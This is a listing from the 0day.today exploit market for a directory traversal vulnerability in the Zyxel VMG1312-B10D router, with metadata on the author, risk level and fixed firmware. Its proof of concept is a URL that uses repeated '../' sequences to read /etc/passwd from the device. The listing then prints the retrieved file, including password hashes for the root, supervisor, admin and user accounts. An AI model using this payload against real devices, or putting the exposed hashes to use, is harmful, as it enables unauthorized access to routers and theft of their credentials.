[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal Vulnerability

Author
numan türle
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-31680
Category
web applications
Date add
26-11-2018
Platform
hardware
# Exploit Title: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal
# Exploit Author: numan türle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
# Tested on: macOS
# Fixed firmware: 5.13(AAXA.8)C0
 
# PoC
@modem_gateway = "192.168.1.1" // default address
 
http://@modem_gateway/../../../../../../../../../../../../etc/passwd
 
here are the contents :
 
############################## contents ##############################
nobody:x:99:99:nobody:/nonexistent:/bin/false
root:zKtrESdI2DPME:0:0:root:/home/root:/bin/sh
supervisor:.t7H3bCRtJ6UY:12:12:supervisor:/home/supervisor:/bin/sh
admin:avHcRxJLoXvas:21:21:admin:/home/admin:/bin/sh
user:AebeEcyKDnOzI:31:31:user:/home/user:/bin/sh

#  0day.today [2024-11-15]  #